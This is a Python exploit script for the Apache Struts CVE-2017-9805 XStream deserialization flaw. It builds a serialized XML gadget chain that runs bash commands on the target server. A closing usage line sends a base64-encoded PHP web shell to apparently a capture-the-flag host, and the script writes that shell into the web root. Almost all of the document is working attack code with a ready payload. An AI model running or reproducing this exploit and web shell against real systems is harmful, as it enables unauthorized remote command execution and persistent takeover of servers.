# Vendor Homepage: https://struts.apache.org/# Software Link: http://mirror.nb

1. # Vendor Homepage: https://struts.apache.org/
2. # Software Link: http://mirror.nbtelecom.com.br/apache/struts/2.5.10/struts-2.5.10-all.zip
3. # Tested Against: Ubuntu 16.04
4. # CVE: 2017-9805
5. # License: MIT License
6. import requests
7. import argparse
8. import base64
9. import sys
10. import random
11. import re
12. from xml.dom import minidom
13. from xml.dom.minidom import parse, parseString
14.  
15. #Lambda function for creating random string
16. random_string = lambda num: ''.join(random.choice("QWERTYUIOPASDFGHJKLXZCVBNMqwertyuiopasdfghjklzxcvbnm123456789012345678901234567890") for _ in range(num))
17.  
18. #iterates over the elements in the template XML object and replaces with desired commands
19. def get_item_list(itemlist, encoded_command, the_match):
20. for item in itemlist:
21. for item2 in item.childNodes:
22. if item2.nodeValue == the_match:
23. item2.nodeValue = encoded_command
24.  
25. #Main function
26. def main(url, command):
27. #XML can be pretty finicky with special characters and escaping. Combine this with command execution with struts and its even more finicky.
28. print('[+] Encoding Command')
29. #So lets encode our user supplied command in base64 and write it to a string using the below struts vuln command with XML friendly characters.
30. #we will save it to a file, execute that file with /bin/bash and then remove the temporary file
31. encoded_command = 'echo '+command+' | base64 -d | tee -a /var/www/html/jhansWebShell.php'
32. print('[+] Building XML object')
33. #Build our initial xml template
34. xml_exploit = parseString('<map><entry><jdk.nashorn.internal.objects.NativeString><flags>0</flags><value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data"><dataHandler><dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource"><is class="javax.crypto.CipherInputStream"><cipher class="javax.crypto.NullCipher"><initialized>false</initialized><opmode>0</opmode><serviceIterator class="javax.imageio.spi.FilterIterator"><iter class="javax.imageio.spi.FilterIterator"><iter class="java.util.Collections$EmptyIterator"/><next class="java.lang.ProcessBuilder"><command><string>/bin/bash</string><string>-c</string><string>COMMANDWILLGOHERE</string></command><redirectErrorStream>false</redirectErrorStream></next></iter><filter class="javax.imageio.ImageIO$ContainsFilter"><method><class>java.lang.ProcessBuilder</class><name>start</name><parameter-types/></method><name>foo</name></filter><next class="string">foo</next></serviceIterator><lock/></cipher><input class="java.lang.ProcessBuilder$NullInputStream"/><ibuffer/><done>false</done><ostart>0</ostart><ofinish>0</ofinish><closed>false</closed></is><consumed>false</consumed></dataSource><transferFlavors/></dataHandler><dataLen>0</dataLen></value></jdk.nashorn.internal.objects.NativeString><jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/></entry><entry><jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/><jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/></entry></map>')
35. #Define some sample headers
36. header = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36','Content-Type': 'application/xml'}
37. #Search for the element that is going to be executed and grab those items
38. itemlist = xml_exploit.getElementsByTagName('string')
39. #Replace the templated with our base64 encoded command which will be decoded and written to a temporary file
40. print('[+] Placing command in XML object')
41. get_item_list(itemlist, encoded_command, "COMMANDWILLGOHERE")
42. print('[+] Converting Back to String')
43. #Convert the XML object back to a string
44. exploit = xml_exploit.toxml('utf8')
45. print('[+] Making Post Request with our payload')
46. #post our exploit XML code to the vulnerable struts server
47. request = requests.post(url, data=exploit, headers=header)
48. print('[+] Payload executed')
49.  
50. if __name__ == "__main__":
51. #Checking for proper arguments of url and desired command to execute
52. parser = argparse.ArgumentParser()
53. parser.add_argument('-u', type=str, help='url of target vulnerable apache struts server. Ex- http://somevulnstrutsserver.com/orders.xhtml', dest='url')
54. parser.add_argument('-c', type=str, help='command to execute against the target. Ex - /usr/bin/whoami', dest='command', required=True)
55. parser.add_help
56. #validate all the arguments were passed
57. if len(sys.argv) < 3:
58. parser.print_help()
59. sys.exit(1)
60. args = parser.parse_args()
61. #Check to make sure a proper url was sent
62. if not bool(re.search(r'^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$',args.url.strip(), re.IGNORECASE)):
63. print('\n---- Invalid Url ----\n')
64. parser.print_help()
65. sys.exit(1)
66. #just make sure ther is some length to the command
67. elif not bool(re.search(r'^.+$',args.command.strip(), re.IGNORECASE)):
68. print('\n---- Invalid Command ----\n')
69. parser.print_help()
70. sys.exit(1)
71. main(args.url, args.command)
72.  
73. COMMAND
74. python exploitPython.py -u http://dev.northpolechristmastown.com/orders.xhtml -c PGh0bWw+DQo8Ym9keT4NCjxmb3JtIG1ldGhvZD0iR0VUIiBuYW1lPSI8P3BocCBlY2hvIGJhc2VuYW1lKCRfU0VSVkVSWydQSFBfU0VMRiddKTsgPz4iPg0KPGlucHV0IHR5cGU9IlRFWFQiIG5hbWU9ImNtZCIgaWQ9ImNtZCIgc2l6ZT0iODAiPg0KPGlucHV0IHR5cGU9IlNVQk1JVCIgdmFsdWU9IkV4ZWN1dGUiPg0KPC9mb3JtPg0KPHByZT4NCjw/cGhwDQogICAgaWYoJF9HRVRbJ2NtZCddKQ0KICAgIHsNCiAgICAgICAgc3lzdGVtKCRfR0VUWydjbWQnXSk7DQogICAgfQ0KPz4NCjwvcHJlPg0KPC9ib2R5Pg0KPHNjcmlwdD5kb2N1bWVudC5nZXRFbGVtZW50QnlJZCgiY21kIikuZm9jdXMoKTs8L3NjcmlwdD4NCjwvaHRtbD4=